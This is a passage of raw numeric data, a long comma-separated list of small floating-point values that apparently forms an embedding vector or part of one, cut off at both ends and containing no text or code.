7,0.003480737,-0.005771641,-0.0061328555,0.0006213138,0.010908276,0.009950639,-0.0055321045,0.0011964197,0.01789131,-0.015776152,0.005534544,0.031710334,-0.0062336144,0.00063096086,-0.0055415537,0.022737438,0.009190674,-0.011777211,0.0031757907,-0.025956877,-0.00095804996,0.02505014,-0.038985975,0.0055936268,-0.0060409387,0.012488736,-0.017327884,-0.011549551,-0.0021503347,-0.020649213,0.04069031,-0.034638837,0.028012715,-0.022301704,-0.023440987,-0.00927898,0.0071200375,0.019003415,0.014166588,-0.016752794,-0.0073163984,-0.0027291423,-0.007155643,0.0060825706,-0.02151512,0.017001104,-0.02082091,-0.018250946,0.0134077985,0.006632812,-0.00726074,0.022523548,0.013401274,0.0022228935,0.0055854083,0.023687122,0.021939622,-0.014019078,0.019736785,-0.015851907,0.02695864,0.007491421,-0.0036848257,-0.019951519,-0.011178917,0.006170279,0.010689318,-0.0014568298,-0.019636713,0.0032891561,0.012280541,0.011403633,0.013231703,0.027044926,-0.023814928,-0.00599192,-0.0018973083,-0.029121397,0.0038715613,0.001076589,-0.00790399,-0.0063014138,-0.016407816,0.032232452,0.0013232832,-0.019983118,0.018147388,0.09260144,0.010404886,-0.0067646694,0.0036125032,0.0032600113,0.0060053705,0.033923052,0.0065607517,0.010697038,-0.0006450654,-0.02215893,-0.0022194458,0.0020630558,0.02540144,0.0021448696,0.010245895,-0.012123209,-0.027676055,-0.01681335,-0.011102529,0.0138751995,0.0042759315,0.0032149882,0.02354329,0.015737992,0.013169387,0.012277114,0.0047627133,0.024428926,-0.0028049403,-0.0024075173,0.025128245,0.016954632,0.027075568,-0.02186981,0.019557638,0.02929252,0.011723243,-0.051304262,-0.00934595,-0.006336319,0.009393181,0.006784035,-0.020158602,-0.011397113,0.038682744,-0.016604984,-0.015000986,-0.016044142,0.020747526,0.010683982,0.0062288796,-0.015812017,0.013390156,-0.024719069,0.012566513,0.0075729326,-0.039341178,0.046130598,0.024005283,0.006447744,0.0148224095,0.0057560694,-0.0005884435,-0.02095915,-0.0052170507,-0.00797005,-0.0118376,0.0022364412,0.009380606,0.010450386,-0.0024485947,-0.007395404,-0.0036377537,-0.0023088611,0.02638624,0.008343672,-0.0116323,0.012196304,0.059986982,-0.021534907,-0.0001406884,0.02874416,0.018268537,0.005456922,0.0028801947,0.011092765,-0.008301988,0.0045091957,-0.014736788,-0.012297618,0.017127287,0.0078089456,0.005002118,0.008446428,0.020713102,0.015119976,0.0053050485,-0.0006326317,0.0120628625,0.0038873479,-0.010421128,0.0073826294,-0.008816824,0.000035493773,-0.00048075995,0.017115317,-0.0050443164,0.008410985,0.04611471,-0.018728286,-0.0021941217,0.011856544,-0.025031129,-0.0038730993,-0.009498294,0.008325133,-0.005444565,-0.011424805,0.0041122595,0.02140168,-0.0040745307,-0.008973171,0.010733992,-0.0068554753,-0.013562845,0.0045983614,-0.030491214,0.0028024095,0.019324183,-0.011252895,0.01061956,0.008893544,-0.037733942,0.023466421,0.016516322,-0.014921484,-0.026533516,0.023190027,0.041974135,0.013862141,0.039486144,0.024150593,0.00588374,-0.011168858,0.026756376,0.03050561,-0.010133516,-0.02167309,-0.002921477,-0.010361915,-0.0054539437,0.007053062,-0.025108628,0.021399694,-0.0022690848,0.022154944,-0.005963858,0.012049247,0.00034258745,0.02662178,-0.033500113,-0.0151277715,0.011632755,-0.014285211,0.030580617,-0.0073141064,0.047237933,-0.008412085,-0.03377532,-0.006733391,0.019955115,0.002522329,-0.0058018994,0.013405331,-0.01754977,0.0071524624,0.008340149,0.03255916,-0.01947181,0.029915918,-0.0115091875,-0.0054724,0.013254886,-0.003258609,-0.021731976,0.001758755,-0.012204432,-0.0038574452,-0.0022188604,-0.028171172,-0.018474517,0.024377404,0.009426112,-0.00672243,-0.02302697,-0.021301921,-0.00029788137,-0.003793627,0.032343276,0.004910855,0.0004065914,-0.0024990956,0.0030191182,-0.0021662428,0.0127287805,0.020038703,-0.0037703882,0.006447744,0.0065101953,0.006532205,0.025720324,0.0035092842,0.0034019127,0.009734355,0.023815088,-0.0049415375,-0.004343497,0.034754556,0.035459068,0.01580963,-0.017054897,0.005437919,-0.005006398,0.0048722746,-0.018932795,-0.003065654,-0.007917616,0.013909679,-0.011372271,0.006260793,-0.022536604,-0.010067336,-0.006347314,0.004040566,-0.0013794643,-0.044437584,-0.009156273,-0.0038685612,0.0004330001,-0.00556795,0.005051253,0.022694487,-0.0073715877,0.009653321,0.011758774,-0.012631089,-0.011071913,0.008792239,-0.013614357,0.008730793,0.018806146,0.008320845,-0.009028768,-0.0111066075,0.0050403127,-0.000052054835,-0.005692638,-0.021611905,0.010190995,0.009340721,-0.0028486939,-0.004121611,0.012138954,-0.037359916,0.0037936019,0.0119435135,-0.021661425,0.007841618,0.00072084565,0.029860573,-0.0014258281,0.004761812,0.01746785,-0.024996467,-0.0035060265,-0.02084347,0.020569395,-0.03070623,0.015059215,0.008704045,-0.005945708,-0.011579886,0.03280386,0.004315718,0.011168001,0.006494527,-0.004251214,-0.0063162334,0.01183652,-0.02183314,0.0004401702,0.009544407,0.007801154,-0.025626138,0.0017979278,-0.030861061,-0.04471571,-0.022334872,0.023761032,0.018839318,0.0039102877,0.0062029334,-0.013477877,0.0016331883,-0.023879705,0.014240437,-0.023601905,0.008857673,-0.003972428,-0.022735082,0.013725426,0.013091076,-0.014380604,-0.0010062339,-0.020146217,-0.005824268,0.0058392812,0.015418192,-0.013224496,0.0067780116,0.018526124,-0.01826331,0.0067615677,-0.020863116,0.025760047,0.0027774097,0.019888233,0.0013939238,0.004464529,-0.004958975,0.004203902,-0.024689406,0.015189165,0.017603233,0.026960753,0.003076254,0.026832502,0.010658239,-0.0026604868,-0.007544213,-0.024242818,0.00986552,0.021160852,0.027366402,0.011167621,0.012259223,-0.0013523923,0.019407175,0.0038495823,-0.019873358,-0.015657518,0.023258623,0.02293832,0.0028891433,0.031457603,0.0010130933,0.01826279,-0.0122915115,-0.009269277,-0.008053379,0.038519915,0.029744722,0.007298126,0.0021221621,0.010352923,-0.0068848045,-0.014043735,-0.010726032,-0.009307955,0.01059539,-0.02870324,0.030658845,-0.023082169,-0.0018601257,-0.04101744,0.0086782025,0.01998291,0.013395905,-0.0031130288,-0.003278051,0.008178708,0.0016444883,-0.015815502,-0.031711217,-0.030469213,-0.005471374,0.038189907,-0.04025201,0.015201428,0.025642466,-0.0053278706,0.00046414434,0.009740808,-0.006236693,-0.032582566,0.012447042,-0.018692825,0.018907618,-0.00547929,0.019887418,0.012391824,-0.0034964676,0.0009413492,-0.010033984,-0.013078791,0.00033132295,0.002954339,0.01857978,-0.01061053,-0.0103356745,-0.004515407,-0.012301735,-0.011694595,0.020791644,-0.044424508,-0.014867028,0.0017043337,0.0060267453,-0.005028228,-0.0062015513,-0.029883523,0.042571437,0.031686895,-0.012657092,0.011197567,0.0013908366,-0.0038441964,0.026518423,0.026298147,-0.003616952,-0.039229877,-0.014121461,0.019890659,-0.016910201,0.01437043,-0.024161771,-0.01492805,-0.024465786,-0.0325149,0.007510086,-0.021935679,0.008822044,-0.009154421,-0.034035463,0.03958631,-0.015681265,0.00020323765,0.034136258,0.012346123,0.0057290215,-0.005347256,-0.011496644,-0.033918,-0.0034326885,-0.00018308597,-0.01731426,-0.011312184,0.024052225,-0.035905607,-0.015015399,-0.028216485,0.002626989,-0.017805967,0.013335363,0.007494014,-0.0067722183,-0.01649326,0.021817334,-0.004466436,0.009468853,-0.020114496,-0.021415537,0.010242327,0.015306505,0.017072255,-0.017358309,-0.011743659,0.027215978,-0.004363125,-0.024914725,0.017045373,0.004211699,0.016172599,-0.007551321,0.0059435763,-0.004720998,-0.005704613,0.031510483,-0.023292622,0.0059319525,0.043531384,-0.018880652,-0.004993551,-0.023348074,-0.010854055,-0.016284114,-0.01931755,0.012446778,-0.023627834,0.0006709319,0.0067088776,-0.011345649,0.0043080067,0.0017856259,0.027471615,-0.006124953,-0.010120006,0.026079219,0.006264241,-0.031102993,0.00023312669,-0.0016011545,-0.013106376,-0.00036350888,0.0039918404,-0.006093972,0.022252813,0.038048223,-0.0076264883,-0.0042338767,0.037354633,-0.009958256,0.0037594368,-0.0072504594,0.012113129,0.0014031883,0.00012408647,0.02659607,-0.02173078,-0.0077521605,-0.0079325745,0.00022508221,-0.000053724456,0.0073712785,-0.0037864733,0.00080620614,-0.0033197526,0.02215523,0.0028425888,-0.002486569,-0.011191314,0.0074311565,-0.002130006,0.00006722165,0.010838107,0.007554074,-0.013893635,0.010793504,0.0020645591,-0.010088222,0.012881573,-0.0054613887,-0.001454684,0.0073892903,-0.007071846,-0.0076746093,0.011067544,0.0008668518,-0.006557077,0.0457589,-0.011437334,0.0021590653,-0.030598933,-0.022344511,0.0070849922,-0.011553975,0.0068938597,-0.006179906,0.0058992594,0.015136106,-0.009447033,-0.03043789,-0.0057281447,-0.049474105,0.018941825,-0.0035276457,-0.004801916,-0.005656858,-0.0074287206,-0.0028322772,0.0093279,0.012660361,-0.027516501,-0.010618492,0.0004037494,0.019663481,0.0048147584,0.0066740685,-0.0055802525,-0.01500306,-0.005537345,0.023129946,0.0030905413,-0.00603948,-0.004561344,0.009577341,-0.0074437144,0.040839463,0.023370514,-0.021584569,0.005238596,-0.024105739,0.0033189126,0.0026270759,0.020026207,0.0047857063,-0.0144710615,-0.006549939,-0.008011136,0.011413697,0.016694054,-0.012936355,0.011386944,-0.009433829,-0.006187483,-0.0042293062,0.03273347,-0.010177781,-0.03319058,0.012752728,-0.015514376,-0.008812671,-0.0076958598,0.018187694,0.011863076,-0.007207068,0.008179975,0.002928041,0.02322952,-0.007937352,0.0034402986,0.022301404,-0.013695808,0.013399174,-0.015995994,0.006638741,0.022841647,-0.018910522,-0.0018748748,-0.005379418,0.01486694,0.0022371795,-0.0142987,-0.008112125,-0.0042117317,-0.026652707,0.006535564,-0.03069558,0.022704784,-0.009167846,-0.022140566,-0.004915535,-0.025341151,-0.0042350967,0.0065113,-0.032436,-0.0027832342,-0.018221008,-0.01039855,0.00505364,0.0022880533,0.004408957,-0.0032933184,-0.0075979233,0.008828125,-0.005461522,0.0220834,0.029433586,0.019562554,0.0009155787,-0.010138511,-0.0017327318,0.008413796,0.022568922,0.00009781491,-0.0039043038,0.06900543,0.013397972,0.00047281905,0.0033857753,0.024141004,0.011971939,0.028910646,0.004111065,0.036634907,-0.012380411,0.016504172,0.029843317,0.0149333,0.0023104127,0.019074166,0.025430262,0.020744376,-0.004578311,-0.007751777,0.03808313,0.015147876,0.024361594,0.023819298,0.025321161,0.013509369,-0.010972848,0.0032292958,-0.002024695,0.017367853,0.016626997,-0.0077034025,0.018105373,0.021626407,0.0061170286,-0.014989961,-0.01482642,-0.011812767,-0.01448346,-0.0062587163,-0.0083955955,-0.018974897,0.01944788,-0.020123955,0.017961599,0.009287338,-0.015170725,-0.0072455206,0.0015306743,-0.025375158,0.0043377616,-0.0072905472,-0.0042410893,-0.008139822,0.0023414765,-0.016520603,0.00899021,0.025025738,-0.010560106,-0.023191072,-0.006087017,0.010964356,-0.0056007914,0.00134963,-0.019940993,-0.014833285,-0.018418318,-0.015406258,0.0028461576,0.024111344,-0.008975564,0.021825619,-0.009233811,-0.019484164,0.030434683,0.031411726,-0.01069318,0.0048611704,0.012721716,0.025716506,0.0022179494,-0.011974047,0.008920994,-0.008694873,-0.010191488,-0.012217825,-0.0028372207,-0.021943377,-0.011573101,0.000047130143,0.015160975,-0.0126666445,-0.020987704,0.039197437,-0.014941088,0.015225924,0.0019056156,-0.0064451657,0.0020740868,0.028073264,-0.007098458,0.019460104,-0.01181243,0.002153325,-0.008114786,-0.029123107,0.010216292,-0.01816008,0.0003387955,-0.0026162395,-0.005116818,-0.024802363,-0.0065812576,0.0008073639,-0.0056776544,0.00038240218,0.02279684,-0.0068136663,-0.005611834,0.013834135,0.0059459335,0.019174797,-0.012810215,-0.024919184,0.042627666,0.014923214,0.0006647136,0.0025772215,0.016279986,-0.0058296635,0.024011554,0.02066444,-0.021127934,0.013519809,0.002785804,0.018452248,-0.02484848,-0.005280931,0.012307228,0.025931057,0.018857554,-0.01493414,-0.012515823,0.0071427794,0.008793324,0.016497703,0.0058470606,0.0162015,-0.0011682971,0.01222701,0.004658504,-0.014122604,-0.02093044,0.011629446,-0.0027430023,-0.011467883,-0.00033025406,-0.015320759,-0.013125304,0.0060236854,-0.01741742,0.0096530495,-0.01730716,0.014744386,0.0029447232,-0.0029037918,0.013482884,0.017020278,0.00019308995,0.00045087942,-0.016535612,0.010360107,-0.0021734012,0.01775765,-0.023767585,0.011520942,-0.0051447405,0.01670928,0.030585311,-0.010757685,0.008519633,-0.03719545,0.012524261,0.029659517,0.0049124793,-0.012156819,0.014946391,0.007069563,-0.01680185,-0.0368344,0.008267575,0.011114191,0.010773046,0.0082899695,-0.012214071,-0.0069117765,-0.0069002346,-0.019879874,0.059128825,-0.007569173,-0.0015524611,0.00015043982,0.014507854,-0.022040578,0.014752138,-0.018686526,-0.00094275275,-0.015808541,-0.030691145,-0.021336563,-0.0101933675,-0.02565321,0.006878666,-0.018808803,-0.008270703,0.0019203833,0.0033693986,0.024312014,-0.0023777212,-0.00004792244,-0.025433296,-0.005097024,-0.00394762,0.009788725,0.029740417,-0.028284214,0.019912146,-0.0130893765,0.0056399885,-0.018268287,0.036037903,0.030207053,-0.012184241,-0.00652686,0.0034777771,-0.013907915,-0.022244645,0.0053031803,-0.0041382415,-0.030698406,0.03655931,-0.007762239,0.021978017,-0.022650726,-0.011319757,0.0008433885,0.0058229193,-0.018309515,-0.012756744,-0.00085181475,-0.014924168,0.009633006,0.005825615,0.024363725,0.01143839,0.015346011,0.022206964,-0.00924467,0.020568362,-0.011561595,-0.00382596,-0.011090198,-0.00082369987,-0.003587293,0.0046181115,-0.017325794,0.02064027,-0.013376675,-0.0010792204,0.0072904914,-0.005009712,0.014007788,-0.006033379,-0.012174669,0.0006313005,0.011960746,0.0020933773,-0.008891267,-0.003523158,-0.017805556,0.02024608,-0.00083552144,-0.022836404,-0.0012923528,0.014239946,-0.0045870286,0.04769801,0.020582877,-0.004246812,-0.00086490193,0.018505221,0.012338364,0.015048342,0.014803067,-0.0012834179,0.004873293,-0.00686042,0.006507897,-0.0061934446,0.006590864,0.01688755,0.0019580366,0.018383972,0.007423118,-0.008113517,-0.015183079,0.008972598,0.021171262,-0.008527832,0.00086048327,-0.021112064,0.010254204,0.01659597,0.020557636,0.018129468,-0.012082283,-0.00776515,0.004732885,0.008376591,0.025061563,-0.015623943,-0.048464075,0.004012504,0.15923217,-0.010420058,-0.0058388407,0.031852815,0.0049442137,0.010790503,-0.09708856,0.0061128605,0.015540552,0.0010987975,0.01050635,-0.013252685,-0.007154714,0.018382879,0.010677311,0.00083360844,-0.0200006,-0.0035136037,0.034727167,-0.009196481,-0.01160019,0.017360793,-0.0032992195,0.0029538723,-0.04317349,-0.015756266,0.003496607,0.01080372,0.0008894062,-0.036956716,-0.0057384367,-0.00789841,0.009435758,0.0073226397,-0.006321331,0.012431116,0.008499221,-0.0048012338,-0.014446086,0.011317277,0.0076866266,0.008661793,-0.014434193,-0.04347665,-0.13762304,0.011047486,0.0010564458,-0.031241152,0.02455085,-0.0141557325,-0.01098683,0.0071484344,0.01500293,0.01650157,0.0013601109,0.013942904,-0.003157327,0.0016377879,-0.0056633814,0.011302844,0.0082458425,-0.00038145581,-0.0087433,-0.010572147,-0.007578313,-0.0020440929,0.0028881822,-0.03955795,-0.021904146,0.009949035,-0.0047356505,0.03932895,-0.013805184,0.006184251,-0.018017769,0.0031479723,-0.031623516,0.0006242938,-0.0033776409,-0.034620892,-0.012171704,0.0118878465,-0.008698268,0.009389109,-0.011198004,0.0049877954,0.010306537,-0.005336763,-0.00083042786,0.041688517,0.021323903,0.008868003,0.015028024,0.0037008561,0.018495163,0.010265022,-0.0070430306,0.007847316,0.0056729815,0.016978778,-0.0032977695,-0.013977407,-0.023579149,-0.00007146313,-0.016733244,-0.02378058,-0.00006352366,0.0037777626,0.037588455,0.0026358701,0.03138654,-0.032285206,-0.001994459,0.01370339,-0.011926314,-0.008121721,0.0049344343,-0.0051659094,0.014177802,0.016000027,0.00015839805,-0.011547307,0.012117945,-0.012970518,0.0028258208,-0.0050428407,0.0030374147,-0.027244814,0.02024196,-0.02024666,0.0019430139,0.00765318,0.008243918,-0.02324689,0.03532925,-0.00016896194,0.02310073,0.0067554507,0.01669517,0.007494276,0.060001496,0.008529623,-0.022711797,0.00603578,-0.008586924,-0.009479053,-0.01021802,0.0028280634,-0.015132758,0.013222311,0.006497847,-0.020904807,-0.028087884,-0.011090946,-0.026545867,-0.0059632133,0.039753783,-0.024865413,-0.016404225,-0.025524851,-0.004425456,0.015654076,0.0039134007,-0.013215004,-0.024788067,0.0060940683,-0.0009265686,0.016080681,0.041123074,0.01874669,-0.029980203,-0.008845408,-0.0069119846,0.008193858,-0.029342325,0.010295964,-0.006658148,0.022638839,-0.032660257,0.0031269484,-0.027284777,0.0044514127,-0.034646567,-0.009184613,0.0023112984,0.013599025,-0.005912624,-0.00018288221,0.021338409,-0.018176988,0.03059171,-0.0055323513,0.012051592,-0.009873879,0.013942733,0.009742427,-0.02705302,-0.007144169,0.019575281,0.0610481,0.010670343,-0.03686049,0.014788604,0.015344079,0.007892205,0.012918429,-0.020627819,0.0073830388,-0.0045517446,-0.037323322,-0.0036939026,-0.009804527,0.004702497,-0.026822226,0.032130893,0.022537053,0.008123432,0.001097337,0.012933581,0.020487988,0.00085838896,-0.007888789,0.01506514,0.007472228,0.019502241,0.0045475424,0.010654031,-0.0006109106,-0.007544667,-0.0037689207,-0.016525904,0.0039918963,0.0006460753,0.032649554,-0.02898777,-0.0056779874,0.009299096,-0.009185858,-0.004241852,-0.0033000943,0.020101193,-0.0039491463,-0.02447058,0.0070123677,-0.0050893542,-0.019923681,-0.004432683,0.022565579,-0.011215297,0.012498232,0.012850121,0.00399456,0.008064172,-0.012055143,-0.0022936126,-0.000040100396,-0.0015774298,-0.009960201,0.0070182006,0.029171234,-0.013790445,-0.01827823,-0.02916124,-0.016727446,0.00095927954,-0.00838258,0.0021308516,0.009665661,0.0036671283,-0.017564738,0.007551198,0.0011062481,0.007082727,0.011427278,-0.016827082,-0.0025320072,-0.00030394437,-0.021150121,0.009070161,0.015333991,0.011307635,-0.004462281,-0.004667829,-0.010993614,-0.04259988,0.0007097053,0.03790798,-0.019158844,-0.0063780034,0.0050918483,0.005314181,0.015480039,0.004718362,0.011950575,0.013073447,0.013614771,0.00386682,0.011706335,-0.0087665655,0.014088383,-0.0019455752,0.008015522,-0.019743422,0.0005112439,-0.013598317,-0.00575328,-0.004011677,0.012099798,-0.012316295,-0.011056808,-0.017385615,0.012864553,-0.039600763,-0.012395312,0.02242779,-0.007015156,0.009242366,0.023872266,0.0008078086,-0.005926213,0.009432271,0.0006571737,0.005095617,-0.0023125412,-0.025290782,0.0027283174,0.01138899,-0.029274682,0.018191893,-0.002766504,0.016744092,0.0005223377,-0.0008498116,-0.008819763,0.016002841,-0.011486379,0.00988914,0.008476185,0.011045639,-0.023952667,-0.025734048,0.0026612969,0.015116181,0.007278299,0.005488551,0.0027932331,-0.0045189518,-0.011434686,0.006381717,-0.043519717,0.010281503,0.010563081,-0.009404791,0.009167684,0.019895503,-0.0044285585,-0.022312319,0.0020257758,-0.011221411,0.0145483045,0.02755293,0.0060117748,-0.012922188,-0.009697994,0.02127223,0.027796647,-0.020874241,0.040623028,0.0010093432,0.009451704,-0.023171885,0.0038190493,-0.007944835,0.01181488,0.0024318767,0.024311263,0.0068472414,-0.00565825,-0.027617287,0.022948438,0.0061942004,0.010648723,-0.0059412066,-0.013999143,0.007898699,-0.00851793,0.017145345,-0.0011604957,-0.021735054,-0.01305475,0.0014886962,0.008112755,-0.0016025922,-0.03024397,-0.011277115,0.010007987,-0.021570219,0.005706159,0.014153944,-0.012884043,0.011812393,-0.03320846,-0.01154892,-0.00063325575,0.0077870893,-0.0005782836,-0.016207976,0.012051975,0.0063074348,-0.016677873,0.017199665,-0.020126205,0.01720902,-0.010512778,-0.025714478,-0.007897576,0.026937844,-0.0041559315,-0.03929962,0.014750333,-0.0074974746,0.0015652464,0.0022942096,0.0051507913,-0.008905372,-0.0271764,0.05532268,-0.0066353474,-0.009233995,-0.0028939762,0.015265536,0.029329613,-0.009189877,0.00213931,-0.014149625,-0.008677143,-0.01695591,-0.045507897,-0.015306789,0.007102952,-0.027496142,-0.026396869,-0.011842499,-0.0050871987,0.0003770106,-0.0052987053,0.021147508,0.0058766003,0.026692068,-0.00008116472,0.0039486643,-0.0482545,-0.004954301,0.0077575683,-0.0264122,0.005953994,0.03507702,-0.013262321,-0.02700087,0.007298844,-0.02625632,-0.008190375,-0.031044936,0.031918466,0.023012485,0.0050463057,0.036711995,0.0002470072,0.0014509116,0.017246539,0.010032363,-0.025523929,0.0017614034,0.02567202,-0.008718555,0.0083834035,-0.0085090045,0.011730803,0.025290832,0.02419794,-0.02728071,0.019848155,0.0038966995,-0.010665376,-0.009925317,0.0034582259,0.021335144,-0.0062553976,-0.011634675,-0.011518781,0.006873743,-0.0018664297,0.007774263,-0.002138442,0.031275436,0.0039316076,-0.007574775,0.00579174,0.008153124,0.022477202,-0.0119907,-0.008333689,0.026621273,0.0024709003,0.00741457,0.023081806,-0.0035495327,0.008333114,-0.0068950555,-0.018137384,0.0049501862,0.030905744,0.008794278,0.008694306,-0.0016779319,0.0007659046,0.05598511,-0.008007139,0.0085595045,0.0034690686,-0.008772584,0.0010080064,-0.01007476,-0.033164706,0.0029190767,-0.037288323,0.00261404,0.008051356,-0.009959825,0.0027580252,-0.029645609,0.011370727,-0.074815445,0.012437687,-0.033419836,-0.007977755,-0.008272625,-0.016335588,0.004739878,0.025763609,0.015606002,-0.05049291,-0.006027021,0.012933029,0.005690867,-0.013503702,-0.008075817,0.012876941,-0.016458755,-0.005590172,-0.008200924,0.018285077,0.024698792,-0.000921935,0.016405648,0.019547319,0.008711731,-0.008355154,-0.010550518,0.02764596,0.010894393,0.0022952338,0.00033953576,0.014167618,0.010005749,0.023134006,-0.010443034,-0.0006908521,-0.014013531,-0.00165399,0.0075105624,0.009607798,-0.014579319,-0.002921043,0.0046696393,-0.002670489,0.012103797,0.000105671454,0.0057753553,0.013423954,0.017651722,0.027111504,-0.026976064,-0.014591849,0.013038661,-0.01298002,-0.00028972715,-0.021896899,0.01282489,-0.0146827465,0.015032186,0.019168304,-0.014504927,-0.014694844,0.0033797424,-0.021133073,0.0033637732,-0.013849108,-0.002162544,-0.023191316,-0.03175082,0.00307524,0.0033904216,0.0026141768,0.004079473,0.0007047052,0.0022873678,0.0012289736,0.022182899,0.0018745557,-0.015557264,0.022054994,-0.027129265,0.001030616,0.0037622405,0.014128507,-0.008371906,-0.01460716,0.009476767,-0.0069849314,-0.017523559,0.012806914,0.025925415,0.0070136553,-0.008281919,-0.026692323,-0.007054868,0.0030670215,0.0018293952,0.017042136,-0.0034430749,-0.003841873,-0.004392201,-0.015988212,0.005682216,-0.018019434,-0.11031083,-0.013246071,0.019781688,0.017667897,-0.02083121,-0.01876658,0.017387317,0.009328585,0.021231914,0.021611365,-0.022836328,-0.0049942606,-0.019695897,0.00478871,-0.0004259011,0.0017797113,-0.023984822,0.01568256,-0.017020598,0.0035796885,-0.0139026465,-0.006393455,-0.011795202,0.006646308,0.018102944,0.008259867,-0.002234936,0.029291801,0.029614976,-0.0081174355,0.0029927755,0.022660457,-0.01388198,-0.00095841405,-0.051431224,0.0035662816,0.0042857286,-0.004054579,0.015199508,0.023082031,0.019033767,0.0076921713,0.01544125,0.004405784,0.008639957,-0.0024509453,-0.017314129,0.033353012,-0.021550173,0.022628466,-0.004176754,-0.011400334,-0.0037944908,-0.000805063,-0.005883446,-0.013219268,0.0072311787,0.014520387,0.0034012694,0.013528146,-0.004381935,-0.009349655,-0.012894336,0.009279047,-0.009027259,0.016369138,0.013750987,0.018499812,0.014277502,0.0015001574,0.013312235,0.027755514,-0.0057063205,-0.010557549,0.034430657,0.009309717,0.014011544,0.023909386,-0.00033578055,-0.0006646749,-0.0032045338,-0.009263854,-0.00014542014,0.0038390444,-0.047022767,0.0055075195,-0.00608841,0.0134844035,-0.00027873743,0.008339629,0.03758636,0.02566221,-0.02426286,0.0365834,0.022518834,0.02089348,0.04064562,-0.02479654,-0.0020468815,-0.0008624078,0.0034235304,-0.021623136,-0.019718355,0.0057047573,-0.021844564,0.020364534,0.023282222,-0.019126423,0.012986697,-0.008636713,0.03223033,0.024465181,-0.035606615,-0.0014037977,0.0068156733,0.014619277,0.0012917581,-0.0068952926,-0.0020200165,-0.005340749,0.009807539,0.00612775,-0.002214361,-0.019295463,0.004085007,-0.017787216,-0.015235801,0.0259206,-0.015090546,-0.036677975,-0.00083076546,0.011112683,0.036800843,0.002035518,0.006047749,0.010420119,-0.014390827,0.02345811,0.004431741,-0.0029628905,0.0025873322,-0.0056303595,0.003859264,-0.008957005,-0.0024594807,0.012974353,0.0032602272,-0.004830225,-0.024751063,0.01677945,0.010211291,-0.0010698988,0.024099989,0.026337363,0.006017499,0.00048825622,-0.014877876,0.0074518514,-0.0032747183,0.022179488,-0.014995038,0.023319159,0.026559684,0.0025454194,0.013695066,-0.0044667386,-0.033267185,0.0028343084,-0.006124306,0.014300345,-0.0027404162,-0.0059051854,0.023660138,-0.05732595,0.007506049,0.017327594,0.0077712853,-0.0064447206,0.045050167,0.020745507,-0.025219128,0.004318851,-0.005511674,0.0010403837,0.004357793,0.0129275415,0.018431865,-0.0084630735,-0.012174205,-0.004150603,0.05234688,0.007936605,-0.010084567,-0.015496735,0.008255863,-0.006673747,0.0023188116,0.0120362155,0.027438533,-0.0032256863,-0.023548802,0.011445734,0.0013393153,-0.03833759,0.014744867,0.015749268,0.000889052,0.050647732,0.010142729,-0.0013927666,-0.014667405,0.024152298,-0.024842365,-0.0011376445,0.015193824,0.018739583,-0.013048622,-0.027115101,0.005266583,0.005213578,-0.00732147,-0.019366987,0.0059221163,-0.0041151615,-0.005294966,0.04425323,0.013466171,0.005075582,-0.02834937,-0.026205597,0.01597931,0.033875085,-0.019257486,-0.009526742,-0.015192548,-0.015555828,0.017210694,-0.015179837,0.0014323894,0.006032218,0.032168653,-0.0065352875,0.031284824,0.008189205,0.029604828,0.0024900388,-0.0054130005,-0.0022779384,0.009395559,0.035950486,-0.013287958,-0.0037132653,-0.011084544,-0.0066081495,0.0067443145,0.0053324965,0.0062596914,-0.012883924,-0.028889064,-0.0052472465,-0.019394003,0.0074210134,-0.027193693,0.01237044,0.013768446,0.012830356,-0.009348006,-0.028624587,-0.011146627,0.009117325,0.015320677,0.0023752465,0.011728903,-0.00732927,-0.014358536,-0.015985366,0.0023395051,-0.013181775,0.009035617,0.01285274,-0.0031145248,0.014633557,0.0014803968,0.028101092,-0.008598985,0.015909849,0.012152481,0.016949132,-0.008724573,-0.008164118,-0.0072560236,-0.010541986,0.010459019,-0.009474301,0.0111548705,0.026369946,0.012282195,-0.013779792,-0.0070857117,0.012799612,-0.0025493724,-0.0071539534,-0.015735118,0.011304003,0.017627891,-0.022677632,-0.012244807,0.017656477,0.002679304,-0.012853165,-0.001467972,0.017518604,-0.017468179,0.017569069,-0.0049539404,0.0040764413,0.002398648,0.0054234965,-0.028066002,-0.009995175,-0.010852598,0.0061716298,0.012049983,-0.011929218,-0.01304853,-0.0076926835,0.006288115,0.03224313,-0.009958675,-0.029943189,0.0030303895,0.004356612,-0.002704502,0.0032028612,0.013609136,-0.010167244,0.018061802,0.033861753,-0.017981093,0.013345827,0.0062578493,0.013629694,0.006135571,-0.013103241,0.010134115,0.023763517,-0.0055228015,-0.00016890783,-0.0036443209,0.0031948013,-0.007253179,0.010699647,0.012879958,-0.0011979545,0.0005369026,0.030910471,-0.044473864,-0.011726465,0.023641154,0.00053867203,-0.027313573,0.019009214,-0.010872355,-0.011945409,0.012820105,-0.022449816,-0.007570287,0.027687265,-0.041251704,0.0043627745,-0.010125544,0.020978741,-0.011048656,-0.04045454,-0.0003428815,-0.09404754,0.0060735815,0.013299835,-0.0027129806,0.054153986,-0.004689393,0.013953494,0.012650125,-0.017814504,0.022328872,-0.0010743485,-0.0037871774,0.0061849016,0.01523075,0.03360874,-0.033616953,-0.009585226,-0.0052930326,-0.009936934,-0.020732924,0.006967135,-0.010262626,-0.018821634,-0.0035284453,0.012949864,-0.0019214301,-0.0026827331,-0.020455435,-0.0010222906,-0.0056154807,-0.001787504,-0.0072003794,-0.020722767,-0.031182818,-0.021112865,-0.0031077494,-0.01563263,-0.0023305363,0.0023500514,-0.02416939,0.005658228,-0.003183808,-0.000041871142,-0.00045893452,-0.022827182,0.017869527,-0.021455333,0.0062859654,-0.022612745,-0.009692838,0.008308736,0.016583554,-0.0037494968,0.030766694,0.007502687,0.00041124705,0.003009255,0.015813308,0.019639187,0.0017954157,-0.0015815691,0.008706677,0.0013157832,-0.016195087,0.0072823213,-0.010992856,-0.006630306,0.01894633,0.008019333,0.0058269068,0.010769833,-0.029860655,-0.007002096,-0.0015421713,-0.004287535,0.006001323,0.011454388,0.0019952669,-0.020840596,0.0064373077,0.065904,0.00067365443,0.014391926,0.02869278,-0.0114257075,0.019735241,0.008220381,0.011148621,0.00913567,-0.010376855,-0.004555481,-0.008699286,0.014263037,-0.004250446,0.026835699,-0.011883329,-0.013152839,0.015234898,-0.020920107,0.0010202463,-0.023786735,0.00468411,-0.006311995,-0.022966143,-0.011969258,-0.0033061004,-0.010111376,0.001893877,-0.013996011,-0.01372627,-0.018886356,0.017817872,0.03344731,0.018580727,0.02183142,0.016970836,-0.0087447595,0.012582192,-0.008652252,-0.023001987,-0.012157354,0.0030458278,-0.019404145,0.034542315,0.033536367,0.00430